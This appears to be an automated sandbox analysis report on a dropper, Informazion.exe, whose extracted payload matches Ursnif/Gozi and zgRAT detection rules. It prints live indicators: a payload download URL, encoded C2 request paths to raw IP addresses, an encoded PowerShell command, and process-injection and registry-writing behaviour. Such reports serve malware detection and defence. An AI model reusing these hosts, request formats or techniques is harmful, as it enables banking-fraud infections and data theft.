Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: maintainabovl.exe, 00000001.00000002.505992302.0000000006D52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://christianbeltran.co
Source: maintainabovl.exe, 00000001.00000002.499268077.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000000.357229830.0000000000842000.00000002.00000001.01000000.00000004.sdmp, maintainabovl.exe.0.dr	String found in binary or memory: https://christianbeltran.co/wp-admin/images/css/ground/bo/Zujiies.png
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/json
Source: maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: christianbeltran.co

Source: global traffic	HTTP traffic detected: GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1Host: christianbeltran.coConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 62.173.149.202Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.41.44.158Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 193.0.178.157Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 174.142.60.54:443 -> 192.168.2.4:49695 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

E-Banking Fraud

Yara detected Ursnif

Source: Yara match	File source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2deb5a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2d6f3f8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.maintainabovl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e03a34.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.maintainabovl.exe.2e0cee0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Code function: 7_2_010952F6 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

7_2_010952F6

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown

Writes or reads registry keys via WMI

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: 1.2.maintainabovl.exe.3d42f70.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.c0e0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.3d82f90.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.3d82f90.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.c0e0000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.3d22f50.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 1.2.maintainabovl.exe.3d42f70.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: maintainabovl.exe PID: 5732, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C512C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,		0_2_00007FF64C512C54
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C511C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,		0_2_00007FF64C511C0C

Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C516CA4	0_2_00007FF64C516CA4
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C515D90	0_2_00007FF64C515D90
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C511D28	0_2_00007FF64C511D28
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C5166C4	0_2_00007FF64C5166C4
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C5140C4	0_2_00007FF64C5140C4
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C512DB4	0_2_00007FF64C512DB4
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C513530	0_2_00007FF64C513530
Source: C:\Users\user\Desktop\Informazion.exe	Code function: 0_2_00007FF64C511C0C	0_2_00007FF64C511C0C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C64AA8	1_2_04C64AA8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 1_2_04C63040	1_2_04C63040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_01097596	7_2_01097596
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_0109826C	7_2_0109826C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_01093EEB	7_2_01093EEB

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_00401E0F NtMapViewOfSection,	7_2_00401E0F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_00401B6A GetProcAddress,NtCreateSection,memset,	7_2_00401B6A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_00401178 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	7_2_00401178
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_010960CC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	7_2_010960CC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Code function: 7_2_01098491 NtQueryVirtualMemory,	7_2_01098491

Source: Informazion.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 493846 bytes, 1 file, at 0x2c +A "maintainabovl.exe", ID 1749, number 1, 11597 datablocks, 0x1503 compression

Source: Informazion.exe, 00000000.00000002.510075821.00007FF64C553000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameanimaltech5.exeP. vs Informazion.exe
Source: Informazion.exe	Binary or memory string: OriginalFilenameanimaltech5.exeP. vs Informazion.exe

Source: Informazion.exe

Virustotal: Detection: 14%

Source: Informazion.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Informazion.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Informazion.exe C:\Users\user\Desktop\Informazion.exe
Source: C:\Users\user\Desktop\Informazion.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Source: C:\Users\user\Desktop\Informazion.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C511C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,

0_2_00007FF64C511C0C

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\maintainabovl.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/6@2/5

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C516CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

0_2_00007FF64C516CA4

Source: C:\Users\user\Desktop\Informazion.exe

0_2_00007FF64C516CA4

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Code function: 7_2_010931AB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

7_2_010931AB

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:492:120:WilError_01

Source: C:\Users\user\Desktop\Informazion.exe

Code function: 0_2_00007FF64C515D90 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,

0_2_00007FF64C515D90

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Informazion.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Informazion.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Informazion.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: Informazion.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: Informazion.exe
Source:	Binary string: wextract.pdbGCTL source: Informazion.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: maintainabovl.exe, 00000001.00000002.509048803.000000000C3C0000.00000004.08000000.00040000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.000000000412D000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000002.499268077.0000000002E94000.00000004.00000800.00020000.00000000.sdmp, maintainabovl.exe, 00000001.00000003.481977865.0000000003FF5000.00000004.00000800.00020000.00000000.sdmp

Source: Informazion.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Informazion.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Informazion.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Informazion.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Informazion.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

